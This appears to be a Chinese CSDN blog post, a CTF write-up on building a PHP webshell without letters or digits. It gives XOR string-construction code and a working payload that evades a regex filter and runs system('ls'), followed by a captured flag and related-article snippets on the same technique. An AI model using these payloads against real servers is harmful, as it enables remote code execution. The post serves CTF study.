无字符webshell

最新推荐文章于 2024-08-12 08:17:21 发布
最新推荐文章于 2024-08-12 08:17:21 发布
阅读量2.1k 收藏 2
点赞数 2
分类专栏: 笔记 ctf 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/121928855
版权
笔记 同时被 2 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏

catflag无字符webshell

本地搭了一个环境,可以看见正则那一块过滤数字和字母。
在这里插入图片描述

无字符webshell

在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们想得到a-z中某个字母,就找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。

<?php
    '#'^'|'; //得到字符 _
    '.'^'~'; //得到字符 P
	'/'^'`'; //得到字符 0
	'|'^'/'; //得到字符 S
	'{'^'/'; //得到字符 T
	$_=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
	//变量$__值为字符串'_POST'
?>

我们按照这个原理编写payload

<?php
$_="`{{{"^"?<>/"; //_GET
${$_}[_](${$_}[__]); //$_GET[_]($_GET[__])
&_=system()
&__=ls//执行函数 eval("system('ls')")

//payload
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=system&__=ls
?>

在这里插入图片描述
在这里插入图片描述
catflag{327a6c4304ad5938eaf0efb6cc3e53dc}

[mzq]
关注
专栏目录
不用字母和数字构造webshell
weixin_46330722的博客
01-21 816
前言 最近做题的时候遇到了许多过滤了字母和数字的代码执行,参考了一些大佬的文章后,就想自己写一篇文章来总结一下不用字母和数字构造webshell的姿势。 测试代码 <?php $c=$_GET[1]; if(preg_match('/[0-9]|[a-z]/i',$c)){ die("error"); } eval($c); ?> 本文所总结的姿势均用此代码测试。 1 位运算 因为不能用字母数字,所以我们可以通过取反,或,异或等位运算利用特殊字符构造出字母数字,再利用php
浅析无字符数字构造webshell
Lemon's blog
08-31 2135
前言: 之前在命令执行的时候多少学了一点,但发现如果不自己去动手实践一下会忘的很快,这次就来动手实践一番。恰好最近做了很多有关无字符数字的CTF题,恰好可以作为例子说一下。 基础知识 0x00:PHP中的异或 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或,异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。 异或规则 0&0=0 1&1=0 0&1=1 1&0=1 两个二
无字母数字webshell之命令执行
最新发布
Theudq的博客
08-12 129
因为禁止了$符号,所以我们无法构造PHP的变量。但是我们在查询资料得到PHP7中,它允许($a)()这样的方法来执行动态函数的,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。在linux中~是表示反码,既就是取反。刚好加在前面就可以。1.webshell长度不超过35。2.正则过滤掉了数字字母还有$和_
PHP-CTF】无字母无数字webshell
尚未佩妥剑 转眼便江湖
10-31 8098
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
无字母数字webshell总结
hackzkaq的博客
05-07 2008
零基础学黑客,搜索公众号:白帽子左一 关于无字母数字Webshell这个话题,可以说是老生常谈了。之前打 CTF 的时候也经常会遇到,每次都让人头大,所谓无字符webshell,其基本原型就是对以下代码的绕过: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } ## 基础知识 ## PHP中的异或 来看这样一段代码: <?php echo "5"^"Z"; ?> 结果
不包含字母和数字的webshell
m0_59049258的博客
08-19 489
当$ 和 _ 没有被限制时。
构造不包含字母和数字的webshell
weixin_54347738的博客
08-20 357
assert(eval())是可以的,assert中执行了eval函数。这里面1提交过去的是字符串,assert函数无法执行字符串。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是!第二行中,ascii码,>的大于
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
无字母数字Webshell是指避开常规字母和数字字符限制的Webshell构造方法。通常,服务器会通过检测输入是否包含字母和数字来防止恶意Webshell的注入。然而,这种防护策略可以通过巧妙的编码转换和利用其他非字母数字...
如何通过非数字与字符的方式实现PHP WebShell详解
12-12
本文主要给大家介绍的是关于通过非数字与字符实现PHP WebShell的相关资料,分享出来供大家参考学习,下面来一起看看详细的介绍: 一般来说,我们所写的webshell通常都会包含数字或字母。比如说下面这样: <?php ...
学习笔记-无字母数字Webshell
人饭子的博客
10-31 1757
无字母数字Webshell 相关文章 & Source & Reference 记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门) 一些不包含数字和字母的webshell 无字母数字Webshell之提高篇 浅析CTF绕过字符数字构造shell 异或绕过 <?php echo "A"^"?"; //输出的结果是字符"~...
php webshell 无后门
03-31
php webshell 无后门,未加密
无字母数字webshell提高
weixin_63231007的博客
01-01 1205
小trick-通过上传临时文件绕过
WebShell
热门推荐
高飞的博客
03-06 11万+
webshell
python调用php命令行,PHP 调用外部系统命令
weixin_42509398的博客
03-09 274
PHP 调用外部系统命令PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你看了本文后,肯定能够回答这些问题了。是否可以?答案是肯定的。PHP和其它的程序设...
webshell详解
w17791476027的博客
08-03 4780
概念webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门文件,得到一个命令执行环境,以达到控制网站服务器的目的。从字面上来说,webshell单词可以拆成webshell。其中web即服务器所开放的web服务。Shell即命令执行环境,用户与服务器操作系统交互的接口。
RCE绕过:无字母数字webshell之命令执行
2301_78612169的博客
08-11 345
因为禁止了$符号,所以我们无法构造PHP的变量。但是我们在查询资料得到PHP7中,它允许。在linux中~是表示反码,既就是取反。刚好加在前面就可以。来执行函数,第一个括号中可以是任意PHP表达式。这样的方法来执行动态函数的,我们可以通过。1.webshell长度不超过35。2.正则过滤掉了数字字母还有$和_
php代码审计--无数字字母构造webshell
D-R0s1的博客
02-12 1418
前言 这篇文章在写的时候我查阅了许多资料也参考了很多师傅的博客,尽我所能的搞懂这个知识点以及要完成这个操作所需要的相关知识。在搞明白以后,回过头来看,其实也没有当初那样晦涩难懂,只是初学起来会因为知识储备不够而走入思维的误区。 网上也有很多的相关资料,但我还是想把这篇文章分享出来,并不是因为我总结的有多好,见解有多深刻,而是每个人在遇到这个问题的时候思维不一样,知识储备不一样,走入的误区也不一样。...
无字母数字的webshell
weixin_43940853的博客
02-29 1761
构造无数字字母的webshell 1.异或 可以看到将A和?进行异或可以得到~ 异或的过程就是将字符转化为ascii,再变为二进制进行异或 这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~ 首先我们实现构造assert($_POST[_]); <?php for ($i=0; $i < 256...
Webshell检测策略:特征分析与加密识别
通过计算文件中字符出现频率与英语文本的差异,如果文件的IC值接近随机字符串的理论值(0.0385),则可能暗示文件已被加密,而这往往是webshell为了躲避检测而采取的手段。 2. 信息熵分析:信息熵衡量的是数据的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值